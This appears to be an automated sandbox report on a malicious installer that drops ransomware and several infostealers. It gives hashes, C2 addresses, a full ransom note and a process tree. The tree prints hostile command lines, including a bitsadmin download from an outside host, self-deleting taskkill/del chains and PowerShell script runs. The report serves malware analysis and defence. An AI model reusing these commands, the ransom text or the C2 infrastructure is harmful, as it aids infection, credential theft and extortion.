Resubmissions

06-09-2021 14:13

210906-rjpvrsedbm 10

08-07-2021 11:08

210708-4gztl3mwl6 10

08-07-2021 08:02

210708-klfb4qeda6 10

07-07-2021 09:39

210707-nem57xyvf2 10

06-07-2021 17:51

210706-7pcrmjy3fa 10

06-07-2021 13:45

210706-eybelwcq86 10

05-07-2021 04:26

210705-z99jkt6lce 10

Analysis

  • max time kernel
    1675s
  • max time network
    1810s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    08-07-2021 11:08

General

  • Target

    setup_x86_x64_install - копия (19).exe

  • Size

    3.2MB

  • MD5

    3ae1c212119919e5fce71247286f8e0e

  • SHA1

    97c1890ab73c539056f95eafede319df774e9d38

  • SHA256

    30c2f230e5401b4b1ea8fb425dadf4e453575884303b9fa2066e6a91859f016e

  • SHA512

    5bb28a775c10b8b68b8c448d64287ca732d0af5577ecc4348a89934358440bb4ff6958115f14ecbabb0446d234d6f621afa3419daa4aec6c03c0af9b6a3b1558

Malware Config

Extracted

Path

C:\_readme.txt

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-mNr1oio2P6 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: helpmanager@airmail.cc Your personal ID: 0315ewgfDdU7G9lD7dF6jB6enq2GwTgCnebr4rB8NXS3mK2dY6
Emails

manager@mailtemp.ch

helpmanager@airmail.cc

URLs

https://we.tl/t-mNr1oio2P6

Extracted

Family

redline

Botnet

ServAni

C2

87.251.71.195:82

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32
rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 1 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 9 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Sets service image path in registry 2 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks for any installed AV software in registry 1 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 15 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 16 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 21 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 6 IoCs
  • Checks SCSI registry key(s) 3 TTPs 33 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 18 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
  • Download via BitsAdmin 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Kills process with taskkill 10 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 8 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 23 IoCs
  • Suspicious use of SendNotifyMessage 9 IoCs
  • Suspicious use of SetWindowsHookEx 26 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2840
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2696
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2680
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
          PID:2440
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2432
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1952
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1376
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                • Modifies registry class
                PID:1332
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1184
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1088
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1028
                    • C:\Users\Admin\AppData\Roaming\fatugbe
                      C:\Users\Admin\AppData\Roaming\fatugbe
                      2⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5056
                    • C:\Users\Admin\AppData\Local\f9bbed39-3606-4438-9ebb-5844705d9646\5BC4.exe
                      C:\Users\Admin\AppData\Local\f9bbed39-3606-4438-9ebb-5844705d9646\5BC4.exe --Task
                      2⤵
                      • Suspicious use of SetThreadContext
                      PID:5912
                      • C:\Users\Admin\AppData\Local\f9bbed39-3606-4438-9ebb-5844705d9646\5BC4.exe
                        C:\Users\Admin\AppData\Local\f9bbed39-3606-4438-9ebb-5844705d9646\5BC4.exe --Task
                        3⤵
                          PID:4260
                      • C:\Users\Admin\AppData\Roaming\fatugbe
                        C:\Users\Admin\AppData\Roaming\fatugbe
                        2⤵
                        • Checks SCSI registry key(s)
                        PID:6344
                      • C:\Users\Admin\AppData\Roaming\hftugbe
                        C:\Users\Admin\AppData\Roaming\hftugbe
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:1940
                        • C:\Users\Admin\AppData\Roaming\hftugbe
                          C:\Users\Admin\AppData\Roaming\hftugbe
                          3⤵
                          • Checks SCSI registry key(s)
                          PID:7152
                      • C:\Users\Admin\AppData\Roaming\twtugbe
                        C:\Users\Admin\AppData\Roaming\twtugbe
                        2⤵
                        • Checks SCSI registry key(s)
                        PID:4736
                      • C:\Users\Admin\AppData\Local\f9bbed39-3606-4438-9ebb-5844705d9646\5BC4.exe
                        C:\Users\Admin\AppData\Local\f9bbed39-3606-4438-9ebb-5844705d9646\5BC4.exe --Task
                        2⤵
                        • Suspicious use of SetThreadContext
                        PID:7052
                        • C:\Users\Admin\AppData\Local\f9bbed39-3606-4438-9ebb-5844705d9646\5BC4.exe
                          C:\Users\Admin\AppData\Local\f9bbed39-3606-4438-9ebb-5844705d9646\5BC4.exe --Task
                          3⤵
                            PID:936
                        • C:\Users\Admin\AppData\Local\f9bbed39-3606-4438-9ebb-5844705d9646\5BC4.exe
                          C:\Users\Admin\AppData\Local\f9bbed39-3606-4438-9ebb-5844705d9646\5BC4.exe --Task
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:5068
                          • C:\Users\Admin\AppData\Local\f9bbed39-3606-4438-9ebb-5844705d9646\5BC4.exe
                            C:\Users\Admin\AppData\Local\f9bbed39-3606-4438-9ebb-5844705d9646\5BC4.exe --Task
                            3⤵
                              PID:2676
                          • C:\Users\Admin\AppData\Roaming\hftugbe
                            C:\Users\Admin\AppData\Roaming\hftugbe
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:5464
                            • C:\Users\Admin\AppData\Roaming\hftugbe
                              C:\Users\Admin\AppData\Roaming\hftugbe
                              3⤵
                              • Checks SCSI registry key(s)
                              PID:3864
                          • C:\Users\Admin\AppData\Roaming\fatugbe
                            C:\Users\Admin\AppData\Roaming\fatugbe
                            2⤵
                            • Checks SCSI registry key(s)
                            PID:5804
                          • C:\Users\Admin\AppData\Roaming\twtugbe
                            C:\Users\Admin\AppData\Roaming\twtugbe
                            2⤵
                            • Checks SCSI registry key(s)
                            PID:7052
                          • C:\Users\Admin\AppData\Local\f9bbed39-3606-4438-9ebb-5844705d9646\5BC4.exe
                            C:\Users\Admin\AppData\Local\f9bbed39-3606-4438-9ebb-5844705d9646\5BC4.exe --Task
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:5888
                            • C:\Users\Admin\AppData\Local\f9bbed39-3606-4438-9ebb-5844705d9646\5BC4.exe
                              C:\Users\Admin\AppData\Local\f9bbed39-3606-4438-9ebb-5844705d9646\5BC4.exe --Task
                              3⤵
                                PID:4888
                            • C:\Users\Admin\AppData\Local\f9bbed39-3606-4438-9ebb-5844705d9646\5BC4.exe
                              C:\Users\Admin\AppData\Local\f9bbed39-3606-4438-9ebb-5844705d9646\5BC4.exe --Task
                              2⤵
                                PID:5188
                                • C:\Users\Admin\AppData\Local\f9bbed39-3606-4438-9ebb-5844705d9646\5BC4.exe
                                  C:\Users\Admin\AppData\Local\f9bbed39-3606-4438-9ebb-5844705d9646\5BC4.exe --Task
                                  3⤵
                                    PID:2784
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                1⤵
                                  PID:340
                                • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (19).exe
                                  "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (19).exe"
                                  1⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:804
                                  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Suspicious use of WriteProcessMemory
                                    PID:3236
                                    • C:\Users\Admin\AppData\Local\Temp\7zS4AC902A4\setup_install.exe
                                      "C:\Users\Admin\AppData\Local\Temp\7zS4AC902A4\setup_install.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of WriteProcessMemory
                                      PID:2692
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c arnatic_1.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:2224
                                        • C:\Users\Admin\AppData\Local\Temp\7zS4AC902A4\arnatic_1.exe
                                          arnatic_1.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Checks processor information in registry
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:3864
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c taskkill /im arnatic_1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS4AC902A4\arnatic_1.exe" & del C:\ProgramData\*.dll & exit
                                            6⤵
                                              PID:5004
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /im arnatic_1.exe /f
                                                7⤵
                                                • Kills process with taskkill
                                                PID:5056
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /t 6
                                                7⤵
                                                • Delays execution with timeout.exe
                                                PID:5116
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c arnatic_2.exe
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:2256
                                          • C:\Users\Admin\AppData\Local\Temp\7zS4AC902A4\arnatic_2.exe
                                            arnatic_2.exe
                                            5⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Checks SCSI registry key(s)
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious behavior: MapViewOfSection
                                            PID:3856
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c arnatic_4.exe
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:996
                                          • C:\Users\Admin\AppData\Local\Temp\7zS4AC902A4\arnatic_4.exe
                                            arnatic_4.exe
                                            5⤵
                                            • Executes dropped EXE
                                            • Suspicious use of WriteProcessMemory
                                            PID:716
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              6⤵
                                              • Executes dropped EXE
                                              PID:4008
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:4648
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              6⤵
                                                PID:4204
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                6⤵
                                                  PID:2460
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c arnatic_6.exe
                                              4⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:3528
                                              • C:\Users\Admin\AppData\Local\Temp\7zS4AC902A4\arnatic_6.exe
                                                arnatic_6.exe
                                                5⤵
                                                • Executes dropped EXE
                                                • Checks computer location settings
                                                PID:3868
                                                • C:\Users\Admin\Documents\IPodcnK3XLkFTN5lOj0s7ydA.exe
                                                  "C:\Users\Admin\Documents\IPodcnK3XLkFTN5lOj0s7ydA.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:4388
                                                  • C:\Program Files (x86)\Browzar\Browzar.exe
                                                    "C:\Program Files (x86)\Browzar\Browzar.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Checks whether UAC is enabled
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:2164
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2164 -s 3216
                                                      8⤵
                                                      • Program crash
                                                      PID:5100
                                                  • C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
                                                    "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:4972
                                                    • C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
                                                      "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:5032
                                                • C:\Users\Admin\Documents\HDgGjYufm_hBZG9nUvrgqJFB.exe
                                                  "C:\Users\Admin\Documents\HDgGjYufm_hBZG9nUvrgqJFB.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:4224
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c cmd < Poi.vsd
                                                    7⤵
                                                      PID:2176
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd
                                                        8⤵
                                                          PID:904
                                                          • C:\Windows\SysWOW64\findstr.exe
                                                            findstr /V /R "^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$" Che.vsd
                                                            9⤵
                                                              PID:4344
                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                              Dare.exe.com D
                                                              9⤵
                                                              • Executes dropped EXE
                                                              PID:2848
                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                10⤵
                                                                • Executes dropped EXE
                                                                PID:4136
                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                  11⤵
                                                                  • Executes dropped EXE
                                                                  PID:5280
                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                    12⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:5396
                                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                                      C:\Windows\SysWOW64\nslookup.exe
                                                                      13⤵
                                                                        PID:5500
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 240
                                                                          14⤵
                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                          • Program crash
                                                                          PID:5076
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping 127.0.0.1 -n 30
                                                                9⤵
                                                                • Runs ping.exe
                                                                PID:3528
                                                        • C:\Users\Admin\Documents\VklvpDTcDOSYW7dDNepm3ji5.exe
                                                          "C:\Users\Admin\Documents\VklvpDTcDOSYW7dDNepm3ji5.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:4400
                                                          • C:\Users\Admin\Documents\VklvpDTcDOSYW7dDNepm3ji5.exe
                                                            "C:\Users\Admin\Documents\VklvpDTcDOSYW7dDNepm3ji5.exe"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Checks SCSI registry key(s)
                                                            • Suspicious behavior: MapViewOfSection
                                                            PID:1544
                                                        • C:\Users\Admin\Documents\Xq0Dh0cSzz59KtLFL2BWyvCI.exe
                                                          "C:\Users\Admin\Documents\Xq0Dh0cSzz59KtLFL2BWyvCI.exe"
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Drops file in Program Files directory
                                                          PID:4508
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjF2DF.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:768
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                8⤵
                                                                • Executes dropped EXE
                                                                PID:4456
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjF2DF.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:6080
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjF2DF.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:5384
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjF2DF.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:5608
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjF2DF.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:4880
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjF2DF.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:2464
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjF2DF.tmp\tempfile.ps1"
                                                                        7⤵
                                                                        • Checks for any installed AV software in registry
                                                                        PID:5864
                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                        "bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
                                                                        7⤵
                                                                        • Download via BitsAdmin
                                                                        PID:5664
                                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pXCqGrdJb7sQvuEj -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                        7⤵
                                                                          PID:6972
                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -phs4opgQYQzGH8jz -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                          7⤵
                                                                          • Drops file in Program Files directory
                                                                          PID:5376
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjF2DF.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:6172
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjF2DF.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:3584
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjF2DF.tmp\tempfile.ps1"
                                                                              7⤵
                                                                                PID:4648
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjF2DF.tmp\tempfile.ps1"
                                                                                7⤵
                                                                                  PID:5396
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjF2DF.tmp\tempfile.ps1"
                                                                                  7⤵
                                                                                    PID:5128
                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\fjnkJfWrEDeA\fjnkJfWrEDeA.dll" fjnkJfWrEDeA
                                                                                    7⤵
                                                                                      PID:1940
                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\fjnkJfWrEDeA\fjnkJfWrEDeA.dll" fjnkJfWrEDeA
                                                                                        8⤵
                                                                                        • Drops file in System32 directory
                                                                                        PID:5744
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjF2DF.tmp\tempfile.ps1"
                                                                                      7⤵
                                                                                        PID:4608
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjF2DF.tmp\tempfile.ps1"
                                                                                        7⤵
                                                                                          PID:6772
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjF2DF.tmp\tempfile.ps1"
                                                                                          7⤵
                                                                                          • Drops file in Program Files directory
                                                                                          PID:4616
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjF2DF.tmp\tempfile.ps1"
                                                                                          7⤵
                                                                                            PID:2780
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsjF2DF.tmp\tempfile.ps1"
                                                                                            7⤵
                                                                                              PID:3840
                                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                              7⤵
                                                                                                PID:5752
                                                                                            • C:\Users\Admin\Documents\078Jlrc6RLR8us8ikbbYmp3L.exe
                                                                                              "C:\Users\Admin\Documents\078Jlrc6RLR8us8ikbbYmp3L.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Checks processor information in registry
                                                                                              PID:3732
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im 078Jlrc6RLR8us8ikbbYmp3L.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\078Jlrc6RLR8us8ikbbYmp3L.exe" & del C:\ProgramData\*.dll & exit
                                                                                                7⤵
                                                                                                  PID:5196
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /im 078Jlrc6RLR8us8ikbbYmp3L.exe /f
                                                                                                    8⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:5356
                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                    timeout /t 6
                                                                                                    8⤵
                                                                                                    • Delays execution with timeout.exe
                                                                                                    PID:5896
                                                                                              • C:\Users\Admin\Documents\LUz1hOei4MEzQkQLJC5kNtNg.exe
                                                                                                "C:\Users\Admin\Documents\LUz1hOei4MEzQkQLJC5kNtNg.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:904
                                                                                                • C:\Users\Admin\Documents\LUz1hOei4MEzQkQLJC5kNtNg.exe
                                                                                                  "C:\Users\Admin\Documents\LUz1hOei4MEzQkQLJC5kNtNg.exe" -a
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4112
                                                                                              • C:\Users\Admin\Documents\eJFn64vy8d6u1U9cNxx_T5kh.exe
                                                                                                "C:\Users\Admin\Documents\eJFn64vy8d6u1U9cNxx_T5kh.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:736
